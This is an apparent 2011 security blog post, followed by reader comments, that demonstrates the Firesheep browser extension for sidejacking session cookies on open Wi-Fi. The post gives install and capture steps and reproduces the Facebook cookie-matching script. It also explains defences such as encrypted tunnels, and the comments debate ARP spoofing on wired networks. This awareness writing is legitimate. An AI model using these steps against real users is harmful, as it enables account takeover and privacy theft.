A Firesheep Overview

Tuesday, January 11, 2011

Antonio Ierano

76814d6a11ad20c1c48be0e9dce501a7

There has been a lot of talk around the FireSheep Firefox extension lately. So I wondered what the hell is this add on about?

I could have read all the available articles, or just done the most unsecure and stupid thing: try it directly... and you can wonder just what I did.

Let’s start with an install of FireSheep.

To install something you usually need to have it, so first I tried to search the FireSheep add on (Google search).

image

Not an easy search since a lot of links showed up, most just related to articles, but at the end I found the right site.

http://codebutler.github.com/firesheep/

I downloaded an XPI file that I opened with Firefox in order to load the extension.

image

Once the extension is loaded you can go to "option" and configure the interface you want to sniff.

image

And the website you want to monitor:

image

Now the most all is done, and the extension is available on Firefox as a side bar.

image

Once activated, it will be on your left. To start the capture just click on "Start Capturing".

All the configuration parameters can be found on the bottom left of the sidebar. You can also add scripts to add more sites to be monitored. Once you stop something like this will be displayed on your left tab:

image

Those are accounts/identities that were accessing sites while you were sniffing. You just have to click on one to access the site using the identity sniffed. It’s as simple as that.

So any question? I got a couple (with answers too).

What exactly will FireSheep do?

Well, it will simply sniff the traffic and provide a simple interface for the user. You can have similar results with WireShark, for example, but you have to manually trace the connection and find the username and password related to the site. Everything would be logged, but FireSheep makes everything easier to do.

image

FireSheep monitors the unsecured network, such as you’d find in just about any public Wi-Fi environment, and watches for cookies being used by browsers to access websites.

FireSheep collects the data within these cookies, enabling someone to access the website with exactly the same credentials. In very simple terms, you can very quickly and easily access the most popular social networking websites using someone else’s credentials – you basically take over complete access to their account!

The scariest thing about this add-on is that it is terribly simple to install and use, but it has limitations and it is not a complete hacking suite (luckily).

On windows (from windows XP up to the newest Windows 7) it needs WinPcap 4.1.2 to work and it work only with the current version of Firefox, so the beta 4 will not be suitable for this.

At the same time it is not (still) available in a Linux version, so this add on is suitable just for Mac and Windows. And honestly on Mac it is even easier to use.

Why does it need a wireless connection?

While you can assume that FireSheep works on wireless LANs because those are less secure, but the reason is much more simpler than that. Without encryption, a wireless LAN connection acts like an old hub, so the collision domain covers all the hosts that are able to see all the traffic.

Usually in a wired network you are directly connected to a switch, and so your network interface, even without encryption, can see only it’s own traffic (and eventually the broadcast/multicast one that is not interesting for FireSheep purposes).

How can I protect myself?

Well, once we understand how this works we can do a couple of things: The FireSheep add-on sniffs http traffic, so any redirecting technique like a proxy agent or a pac file to redirect to a proxy will be useless unless you are able to force an encryption between the device and the proxy.

The problem is that even if you don’t go directly to a website, but pass through a proxy, the traffic will be http. FireSheep is looking for http traffic and will search for cookies transmitted, so it does not really care if you use an intermediate security host (proxy or whatever) or not.

At the same time the intermediate security host can not detect any intrusion, since nothing is changed in the user traffic, it is simply sniffed without any change to the traffic itself.

In terms of products, to be clear, you would be protected either using something like the  ScanSafe agent Anywhere+ (because it encrypts all the traffic from the device to the ScanSafe cloud server), or AnyConnect with it’s SSL tunnel and WSA integration.

You would not be protected by a non-encrypting agent like the WebRoot One or a proxy browser configuration like in Zscaler, MacAfee or Websense just because  you would send http traffic that FireSheep could sniff anyway.

Is using FireSheep breaking the law?

To write the code or install the add on is legal, how you use  and what you do with the add on could be, on the other hands, a crime. Remember that stealing another user's credentials is violating their privacy, and this can lead to legal consequences in several countries.

Just for fun: this is the script used for Facebook, the main parameters are the domain and URL, and the cookie names to search for during the sniffing activities.

// Authors:
//   Eric Butler
register({
  name: 'Facebook',
  url: 'http://www.facebook.com/home.php',
  domains: [ 'facebook.com' ],
  sessionCookieNames: [ 'xs', 'c_user', 'sid' ],

  identifyUser: function () {
    var resp = this.httpGet(this.siteUrl);
    this.userName   = resp.body.querySelector('#navAccountName').innerHTML;
    this.userAvatar = resp.body.querySelector('#navAccountPic img').src;
  }
});

Basically you could find what kind of info you need to feed to FireSheep (or to do the same stuffs using TCPDump or WireShark) just monitoring your own traffic.

OK I admit that on WireShark the job could be a little tedious.

image

Using http, watch for example you can directly find the cookies involved clicking on the Cookies tab.

image

So nothing really new under the sun with FireSheep, just a very easy interface that exposes something we all should know (at least who work in this arena).

Do we really need something like FireSheep to realize how easy sniffing credentials can be? If so, we should welcome FireSheep for providing us with a little more awareness.

Cross-posted from Portadiferro

Possibly Related Articles:
25689
Network Access Control
Hacking firesheep Sniffing WireShark add-on
Post Rating I Like this!
065b7cfbbb03ac9d18cbf5ed0615b40a
Stefan Fouant Excellent article Antonio, but I just wanted to point out that the idea that Firesheep only works on wireless networks is false. This can be exploited on both wireless and wired networks, and can in fact also be exploited on wireless networks that implement encryption. I covered this in my articles on "The Misconceptions of Sidejacking with Firesheep" - https://www.infosecisland.com/blogview/10209-The-Misconceptions-of-Sidejacking-with-Firesheep.html and also my article on "Man in the Middle (MITM) Attacks Explained" - https://www.infosecisland.com/blogview/10475-Man-in-the-Middle-MITM-Attacks-Explained.html
1294863746
0b8d1c9dc5f4a80e6646d8d18b8683fe
Ben Keeley It maybe possible with wired yes, but with all due respect in an enterprise environment its v.unlikely. Most enterprise switches offer arp spoofing protection...
http://www.cisco.com/en/US/docs/switches/lan/catalyst6500/ios/12.1E/native/configuration/guide/port_sec.html

And then there is the IDS/IPS.... which should also detect arp spoofing.
1294935163
76814d6a11ad20c1c48be0e9dce501a7
Antonio Ierano Stefan

you are absolutely right firsheep can be used in different environment, but as you mentioned, it require anyway a litte bit more of geek works.

I think the point is not in the sidejacking technology but the easy implementation of the tool that moved all those rumors.

The idea was to provide a proof of how easy would be for a "no-geek" user to make this relatively simple hack on unprotected networks (and so, for example, showing how a quite easy piece of malware could have done the same)

if the idea was to point out that open wireless networks are, as a matter of fact, high risk areas in terms of privacy and data protection :) I think firesheep did a good job.

as i worte there were anything news, and the same "joke" could have been "easily" done with a simple sniffer.

arp spoofing, sidejakcing and MITM are way too moe complex subjects to be explained to the vast majority of internet users (and many journalist and security experts as well, he he he he).

PS i've read your articles and they are very good :)



1294936240
065b7cfbbb03ac9d18cbf5ed0615b40a
Stefan Fouant Ben, I agree that those are certainly options, and I covered in my article on MITM attack mitigation mechanisms. However, to say that it is unlikely to be exploited on Enterprise networks is not at all realistic and in fact is a dangerous claim because it will lead enterprise users into a false sense of security.

First of all, how many enterprise environments utilize an IDS/IPS on their user LAN segments? In my experience it is almost nil. After years and years of talking about the perimeter model being dead, most enterprises still utilize their IDS/IPS systems as a perimeter technology, looking for suspicious signatures entering their environment or data being exfiltrated.

With regards to ARP spoofing protections, there are caveats and ways to circumvent these protections. And for the record, Port Security does not prevent ARP spoofing, but rather other mechanisms are used to prevent it like ARP inspection coupled with DHCP binding tables, etc. Once again, in my experience, I rarely see enterprises deploying such mechanisms because they are either poorly implemented or not well understood.

The bottom line is that these types of vulnerabilities exist whether we are talking about Wireless or Wired networks. To say that there are protections in the network layer equipment that make it unlikely is not a good enough answer - it causes users to be careless and not be responsible for their security. The answer to these problems can only be solved with true end-to-end encryption and anything less is tantamount to failure.
1294936788
0b8d1c9dc5f4a80e6646d8d18b8683fe
Ben Keeley Guess it depends on the enterprise network :)

I have personally seen individuals caught ARP spoofing within an office space environment, with the relevant outcomes you'd expect. And I know several company networks that have IPS/IDS between user segments (let alone backend).

The point is in an enterprise wired network, users do not decide the security posture of their machines, the business does (with our input) and there are bigger threats than the use of firesheep IMHO.
1294937414
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.